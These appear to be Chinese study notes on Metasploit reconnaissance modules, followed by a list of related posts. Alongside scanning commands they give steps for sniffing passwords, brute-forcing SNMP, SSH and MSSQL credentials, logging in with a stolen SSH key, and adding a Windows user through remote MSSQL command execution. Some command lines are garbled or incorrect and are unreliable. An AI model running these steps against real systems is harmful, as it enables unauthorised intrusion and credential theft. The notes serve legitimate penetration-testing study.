MSF(三):信息收集
MSF(三):信息收集
安全牛学习Metasploit Framework笔记
1、Nmap扫描开启了哪些服务
db_nmap -sV 192.168. 1.0/24
2、Auxiliary扫描模块使用时,指定RHOSTS或RHOST
192.168.1.20-192.168.1.30或192.168.1.1-30或192.168.1.0/24, 192.168.11.0/24, 192.168.100.141或file:/root/h.txt
3、arp扫描
use auxiliary/scanner/discovery/arp_sweep
4、端口扫描
use auxiliary/scanner/portscan/syn
5、Nmap IPID ldle扫描
查找ipidseq主机,通俗来讲就是寻找ipid是递增的主机
use auxiliary/scanner/ip/ipidseq
set RHOSTS 192. 168.1.0/24
run
找到之后使用namp进行idle扫描
nmap -PN -sI 1.1.1.2 1.1.1.3
6、UDP扫描模块
use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/udp_probe
7、密码嗅探
使用模块:use auxiliary/sniffer/psnuffle
抓取kali向外发送的请求中的账号和密码
支持从pcap抓包文件中提取密码
功能类似于dsniff,目前只支持pop3、imap、ftp、HTTP GET协议
8、SNMP扫描(udp端口)
(1)先修改为开放状态:vi /etc/default/snmpd
(2)侦听地址修改为0.0.0.0或其它非127.0.0.1的IP
(3)重启服务:cd /etc/init.d/snmpd restart
(4)nmap -p161 -sU x.x.x.x,会显示open
渗透:
(1)进行扫描snmp,扫描出的community相当于密码,(密码若只读,可以读取配置;密码若读写,可以更改服务器的配置)
use auxiliary/scanner/snmp/snmp_login
(2)前面爆破成功后,接下来读取服务器上的配置
use auxiliary/scanner/snmp/snmp_enum
(3)扫描目标有多少个用户
use auxiliary/scanner/snmp/snmp_enumusers(windows)
(4)扫描目标有多少个文件共享,不能显示隐藏的管理共享
use auxiliary/scanner/snmp/snmp_enumshares(windows)
9、SMB系列扫描
use auxiliary/scanner/smb/smb_version
SMB版本扫描use auxiliary/scanner/smb/pipe_auditor
扫描命名管道,判断SMB服务类型(账号、密码)use auxiliary/scanner/smb/pipe_dcerpc_auditor
扫描通过SMB管道可以访问的RCERPC服务use auxiliary/scanner/smb/smb_enumshares
SMB共享枚举(账号、密码)use auxiliary/scanner/smb/smb_enumusers
SMB用户枚举(账号、密码)use auxiliary/scanner/smb/smb_lookupsid
这个snmp和smb差不多的功能,由实验可知smb枚举的更详细,完整
10、SSH系列扫描
- SSH版本扫描
use auxiliary/scanner/ssh/ssh_version
- SSH密码爆破
use auxiliary/scanner/ssh/ssh_login
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
set VERBOSE true
run
- SSH公钥登陆(id_rsa是通过其它方法窃取到的)
use auxiliary/scanner/ssh/ssh login_pubkey
set KEY_FILE id_rsa ; set USERNAME root ; run
11、检查目标Windows缺少的补丁
前提:基于已经取得的session进行检测
利用模块:
use post/windows/gather/enum_patches
show advanced
set VERBOSE yes
如果检查失败出现:Known bug in WMI query, try migrating to another process
可以迁移到另一个进程再次尝试,建议migrate spoolsv.exe的PID(或者explorer.exe,总之迁移到有system权限的进程内)
12、Mssql扫描端口
- 如果发现机器上开放着1434,可以基本确定开放了myssql服务
TCP 1433(动态端口) / UDP 1434 (查询TCP端口号),根据UDP 1434查看TCP端口
use auxiliary/scanner/mssql/mssql_ping
- 爆破mssq|密码
use auxiliary/scanner/mssq|/mssql_login
- 知道密码后,连接数据库端口,然后远程执行系统命令
use auxiliary/admin/mssql/mssql_exec
set CMD net user user pass /add
13、FTP系列利用模块
- use auxiliary/scanner/ftp/ftp_version
- use auxiliary/scanner/ftp/anonymous
- use auxiliry/scanentpttp_login
MSF(三):信息收集相关推荐
- Kali与MSF之信息收集
目录 kali内通过DNS或IP地址收集目标信息 1.Whois 2.Nslookup 3.Host 4.ICMP Ping MSF内主机探测与端口扫描 一.主机探测 arp_sweep模块主机探测 ...
- 内网渗透-内网信息收集
内网信息收集 文章目录 内网信息收集 前言 msf模块中的信息收集 msf反弹shell后的信息收集 内网信息收集 后记 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们 ...
- [网络安全提高篇] 一〇三.Metasploit后渗透技术之信息收集、权限提权和功能模块
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- 内网渗透(三):信息收集
文章目录 前言 MSF 模块 shell 模块 后记 前言 本博文仅供学习使用,请勿他用!!! 网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会 ...
- Kali Linux 渗透测试之被动信息收集(三)——Recon-NG框架
Recon-NG框架 (1)Recon-NG框架简介 Recon-NG是由python编写的一个开源的Web侦查(信息收集)框架,命令格式与msf一致: Recon-NG框架是一个全特性的工具,使用它 ...
- 【Metasploit总结】之【MSF常用命令及信息收集】
操作系统:kali Linux2020.3 smfconsole常用命令 msfconsole下可以直接使用终端命令,如ping等 msfdb start # 启动msf数据库,msf数据库默认使用的 ...
- <渗透测试学习指南> 信息收集(三)获取目标应用版本等详细信息
转载请注明作者和出处: 本章将讲述如何获取目标系统信息.端口信息等详细信息 上一章我们讲到了获取目标真实IP及子域名信息的几种典型方法,但是单靠真实IP和子域名还无法让我们顺利的完成一项渗透测试任务, ...
- 三分钟学会渗透测试——信息收集
什么是信息收集 信息收集主要是收集服务器的配置信息和网站的敏感信息,主要包括域名信息.子域名信息.目标网站信息.目标网站真实IP.目录文件.开放端口和服务.中间件信息等等.在进行渗透测试之前,第一步也 ...
- Nmap、MSF、Netcraft、nslookup、whois信息收集工具使用
转载请注明作者及出处: 被动信息收集 使用被动.间接的信息收集技术,可以在不接触目标系统的情况下挖掘目标信息.例如,可以用被动信息收集技术确定网络边界情况和网络运维人员,甚至了解到目标网络中使用的操作 ...
最新文章
- A simple Test Client built on top of ASP.NET Web API Help Page
- beego 文件服务器,beego自动化文档
- 上线数据导入的几个注意事项
- 被忽视的fuzzywuzzy库
- 四、用户、群组和权限(未完结)
- 经典题目螺旋方阵的详解
- android学习笔记17——对话框(PopupWindow)
- 3天超4亿 《阿丽塔:战斗天使》中国票房超北美
- 年度旗舰机广告片遭电视台泄露 三星:我有句话不知当讲不当讲
- JQuery判断radio是否选中并获取选中值的示例代码
- 10 个 Linux 网络和监控命
- 【性能测试】JSON工具 对比 fastjson jackson
- 如何保存网站上的背景图片
- 数据挖掘与机器学习——数据挖掘概述
- 算法分析之常用符号大O、小o、大Ω符号、大Θ符号、w符号
- 使用cmd命令远程重启服务器
- 女生突然不回微信,那你首先得明白不回微信的原因
- 《推荐系统实践》 第四章 利用用户标签数据 读书笔记
- KTorrent 2.2 公布
- 去哪儿网BI平台建设演进与实践